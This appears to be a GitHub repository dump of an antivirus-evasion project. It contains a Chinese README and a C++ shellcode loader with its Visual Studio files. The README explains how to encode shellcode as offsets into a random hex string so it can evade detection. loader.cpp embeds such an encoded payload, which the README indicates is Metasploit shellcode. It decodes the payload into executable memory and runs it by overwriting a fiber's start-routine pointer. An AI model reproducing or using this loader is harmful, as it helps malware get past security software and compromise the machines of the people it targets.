├── BypassAv2 ├── OffsetClac │ ├── offestcalc.cpp │ ├── OffsetClac.vcxproj.user │ ├── OffsetClac.vcxproj.filters │ └── OffsetClac.vcxproj ├── Loader │ ├── Loader.vcxproj.user │ ├── Loader.vcxproj.filters │ ├── loader.cpp │ └── Loader.vcxproj └── BypassAv2.sln └── README.md /BypassAv2/OffsetClac/offestcalc.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/rixoye/OffsetBypassAv/HEAD/BypassAv2/OffsetClac/offestcalc.cpp -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj.user: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OffsetBypassAv 2 | 3 | 4 | ### 免杀思路 5 | 随机找一个包含`0-f`的字符串,将shellcode用该字符串的偏移量进行解析,输出偏移量数组。 6 | 7 | 实际加载时再从该随机字符串中提取对应的字符拼接,形成shellcode后再执行。 8 | 9 | ### 部分代码讲述 10 | OffsetClac文件夹下是计算偏移的代码,shellcode和随机字符串自个替换就可以使用了,计算偏移过程中,只要注意一下,16进制和ASCII码字符的转换就好了。 11 | 12 | Loader文件夹下是一个shellcode加载器,在shellcode的加载器中,我使用了Windows系统回调函数触发shellcode的方式,代码中仅写了x64下的,x86下的要自个重新计算CreateFiber函数的回调函数偏移量。 13 | 14 | ### 实际免杀效果 15 | 由于没有去做反沙箱的手段,所以沙箱运行的内存识别还是发现了msf的shellcode特征。 16 | url:https://www.virscan.org/report/afaaee5837f656499f91cd37fca8fa78a597df1ff66bcc716282c982fb6d268d 17 | image 18 | 19 | 20 | ### 代码 21 | https://github.com/rixoye/OffsetBypassAv 22 | -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 
{4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /BypassAv2/BypassAv2.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.32126.315 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "OffsetClac", "OffsetClac\OffsetClac.vcxproj", "{479EC10B-37D7-4335-AF11-9C469DC98198}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loader", "Loader\Loader.vcxproj", "{CD80CA90-7FDE-4BDA-8E51-C0948E793844}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | 
{479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x64.ActiveCfg = Debug|x64 19 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x64.Build.0 = Debug|x64 20 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x86.ActiveCfg = Debug|Win32 21 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Debug|x86.Build.0 = Debug|Win32 22 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x64.ActiveCfg = Release|x64 23 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x64.Build.0 = Release|x64 24 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x86.ActiveCfg = Release|Win32 25 | {479EC10B-37D7-4335-AF11-9C469DC98198}.Release|x86.Build.0 = Release|Win32 26 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x64.ActiveCfg = Debug|x64 27 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x64.Build.0 = Debug|x64 28 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x86.ActiveCfg = Debug|Win32 29 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Debug|x86.Build.0 = Debug|Win32 30 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x64.ActiveCfg = Release|x64 31 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x64.Build.0 = Release|x64 32 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x86.ActiveCfg = Release|Win32 33 | {CD80CA90-7FDE-4BDA-8E51-C0948E793844}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {BBD688C1-579B-4707-A530-7EAB3221D5E7} 40 | EndGlobalSection 41 | EndGlobal 42 | -------------------------------------------------------------------------------- /BypassAv2/Loader/loader.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | //#define DEBUG 4 | #ifdef DEBUG 5 | #define TRACE() debugPrint(__FILE__,__LINE__) 6 | #else 7 | #define TRACE() 8 | #endif 9 | void debugPrint(CONST CHAR* path, INT line) { 10 | #ifdef DEBUG 11 | printf("file:%s line:%d error:%d\n", path, line, 
GetLastError()); 12 | #endif // DEBUG 13 | } 14 | 15 | 16 | unsigned int buf[] = { 17 | 9,10,11, 0, 0, 4,13,11, 9,15,13, 0,10,15,15,15, 18 | 15,15,15,15,11, 3, 6, 3,11, 3, 6,15, 6, 5, 6, 3, 19 | 6, 7,11, 0, 4, 3,14, 5, 7, 6,11, 0, 0, 8, 6, 5, 20 | 7,15,11, 0, 0, 8, 6, 5, 3, 0,11, 0, 0, 8, 6, 5, 21 | 5,15,11, 0, 0, 8, 1, 5, 6,15,11, 0,15, 9, 8, 1, 22 | 11, 2,11, 2,11,14, 4, 3,10,12,11, 0, 4, 3,10,15, 23 | 2,10, 4,10, 7, 3, 1,10,15, 5, 5,10, 5,15,11, 3, 24 | 10, 3,10,12,15,14,11, 3,15, 3,10, 3,13, 5,13,14, 25 | 6, 5,11, 3, 6, 3,11, 0, 0, 8, 6, 5, 5,15, 0, 8, 26 | 11, 5, 4,10,11, 0,15, 3,14,15, 0, 8, 0,15, 0, 0, 27 | 15,15,15,15,15,15,11, 0, 0, 6,10,15, 1,11, 7, 1, 28 | 11, 0,15, 3,14,15, 6,15, 0, 8,11, 0, 3, 0,11,11, 29 | 0, 8,11,15, 5,15,11,12,15, 3,14,15,13, 4, 6, 7, 30 | 11, 0, 9, 9,10,12,11, 3, 0, 8, 4,11, 0, 0,11, 0, 31 | 15, 3,14, 7,11,14, 4, 3,10,12,11, 0, 4, 3,10,15, 32 | 2,10,11, 3,10, 3,10,12,15,14,11, 3,15, 3,10, 3, 33 | 4, 0,13,15, 1, 6, 9, 3,11,10,15, 4,11,10, 5,11, 34 | 15, 0,11, 6, 4,12,14, 3, 1, 6,14, 0, 6, 0,11,11, 35 | 0, 8,11,15, 5,11,11,12,15, 3,14,15, 7, 7,11, 3, 36 | 0, 8,15,10,11, 0,11,11, 0, 8,11,15, 3,10,11,12, 37 | 15, 3,14,15,11, 3, 0, 8,15,11, 0, 0,11, 0,15, 3, 38 | 14,15,11, 3, 6, 0,11, 3, 6, 0, 6,13, 6,12, 6, 2, 39 | 11, 3, 6, 0,11, 3, 6,12,11, 3, 6, 2,11, 0, 0, 4, 40 | 13,10, 5,15,11, 3, 6, 5, 9, 9,13,15, 6, 0,11, 3, 41 | 6,12, 6, 2,11, 0, 0, 8, 3, 5,13,12, 6, 1, 9, 9, 42 | 9, 9, 9, 9, 6,14,11, 0, 8, 2,15, 3,15,15,15,15, 43 | 15,15,15,15,15,15,15,15,15,15,11, 0, 0,14, 0,14, 44 | 15, 3,15, 3,15,15,15,15,11, 3, 8, 2, 4, 3, 0, 8, 45 | 7, 9, 0, 1, 9, 9,14, 6, 8, 8, 9,15, 8, 6, 2, 5, 46 | 6, 7,11, 3, 8, 2, 2, 7,12, 6, 8,14,12,14, 9, 9, 47 | 14, 6,11, 0, 0, 4,10,11, 5, 0, 4,10,15, 7, 1,10, 48 | 15, 2, 0,15, 9, 8,13,15, 1, 6,15, 6, 8, 8,11, 1, 49 | 3, 4, 1, 5, 7, 9, 7, 2,15,15, 6,12,11, 3, 0,12, 50 | 14, 2, 9, 9,14, 6, 7, 4, 7, 3, 7,10, 7, 4, 5,13, 51 | 7, 6, 1, 0, 7, 6,15,15,15,15 }; 52 | 53 | char table[] = "87a13256bfc49ed0"; 54 | 55 | char 
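itoh(int i) {
    // Continues the `char itoh(...)` declaration started on the previous line.
    // Maps an index 0..15 into `table` to the numeric value of the hex digit
    // stored there. Only '0'-'9' and 'a'-'f' are handled: 0x60 is the split
    // between digits and lowercase letters, so an uppercase digit in `table`
    // (0x41..0x46 < 0x60) would be mapped wrongly. `i` must stay within the
    // 16 characters of `table`; there is no bounds check here.
    char c = table[i];

    if (c < 0x60) {
        c = c - 0x30;           // '0'..'9' -> 0..9
    }
    else {
        c = c + 0x0a - 0x61;    // 'a'..'f' -> 10..15
    }
    return c;
}


// Rebuilds bytes from the offset array: consecutive pairs in `off` are the
// (high nibble, low nibble) indices into `table`. Exactly offlen/2 bytes are
// written to `buf`, which the caller must have sized for at least that many;
// a trailing unpaired entry in `off` is ignored, and offlen <= 1 writes nothing.
void code(void *buf, unsigned int* off, int offlen) {
    int len = offlen / 2;
    char* out = (char*)buf;
    for (int i = 0; i < len; i++) {
        int j = 2 * i;  // j + 1 < offlen is guaranteed by i < offlen / 2
        int value = ((itoh(off[j]) << 4) & 0xf0) | (itoh(off[j + 1]) & 0x0f);
        out[i] = (char)value;
    }
}


// Entry point: decodes the embedded offset array into a freshly committed
// read/write/execute region, then runs it by rewriting the start-routine
// slot of a fiber created with debugPrint as its nominal routine.
// Every Win32 call that can fail is checked; on failure the process exits
// with a non-zero status instead of dereferencing a NULL result.
int main() {
    // Number of nibble indices in `buf`; the decoded payload is half that.
    const size_t nibbles = sizeof(buf) / sizeof(buf[0]);

    if (ConvertThreadToFiber(NULL) == NULL) {
        TRACE();
        return 1;
    }

    LPVOID lpFiber = CreateFiber(0x100, (LPFIBER_START_ROUTINE)debugPrint, NULL);
    if (lpFiber == NULL) {
        TRACE();
        return 1;
    }

    // Allocation size matches the original (one byte per nibble index), which
    // is twice what the decoded output needs. The page is RWX from the start.
    LPVOID addr = VirtualAlloc(NULL, nibbles, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (addr == NULL) {
        TRACE();
        return 1;
    }
    code(addr, buf, (int)nibbles);

    // Overwrite the fiber's start-routine pointer at the fixed offset 0xB0 from
    // the fiber handle. This is an undocumented structure layout and the value
    // is only valid for x64 (the README states the x86 offset must be
    // recalculated), so refuse to build for any other pointer size rather than
    // silently corrupting the wrong field.
    static_assert(sizeof(void*) == 8, "fiber start-routine offset 0xB0 is x64-specific");
    uintptr_t* tgtFuncAddr = (uintptr_t*)((uintptr_t)lpFiber + 0xB0);
    *tgtFuncAddr = (uintptr_t)addr;

    SwitchToFiber(lpFiber);
    return 0;
}
-------------------------------------------------------------------------------- /BypassAv2/OffsetClac/OffsetClac.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {479ec10b-37d7-4335-af11-9c469dc98198} 25 | OffsetClac 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | Level3 88 | true 89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 90 | true 91 | 92 | 93 | Console 94 | true 95 | 96 | 97 | 98 | 99 | 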
Level3 100 | true 101 | true 102 | true 103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 104 | true 105 | 106 | 107 | Console 108 | true 109 | true 110 | true 111 | 112 | 113 | 114 | 115 | Level3 116 | false 117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 118 | false 119 | Default 120 | 121 | 122 | Console 123 | true 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | false 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | false 134 | Default 135 | 136 | 137 | Console 138 | true 139 | true 140 | true 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /BypassAv2/Loader/Loader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {cd80ca90-7fde-4bda-8e51-c0948e793844} 25 | Loader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | Unicode 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | false 78 | 79 | 80 | true 81 | false 82 | 83 | 84 | false 85 | false 86 | 87 | 88 | 89 | Level3 90 | true 91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 92 | true 93 | 94 | 95 | Console 96 | true 97 | 98 | 99 | 100 | 101 | Level3 102 | true 103 | true 104 | true 105 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 106 | true 107 | 108 | 109 | Console 110 | true 111 | true 112 | true 113 | 114 | 115 | 116 | 117 | Level3 118 | false 119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 120 | true 121 | true 122 | MultiThreaded 123 | MinSpace 124 | Default 125 | 126 | 127 | Console 
128 | false 129 | false 130 | 131 | 132 | 133 | 134 | Level3 135 | false 136 | false 137 | false 138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | false 140 | true 141 | MultiThreaded 142 | MinSpace 143 | Default 144 | false 145 | None 146 | Fast 147 | false 148 | false 149 | false 150 | false 151 | 152 | 153 | Console 154 | true 155 | true 156 | false 157 | false 158 | false 159 | true 160 | false 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | --------------------------------------------------------------------------------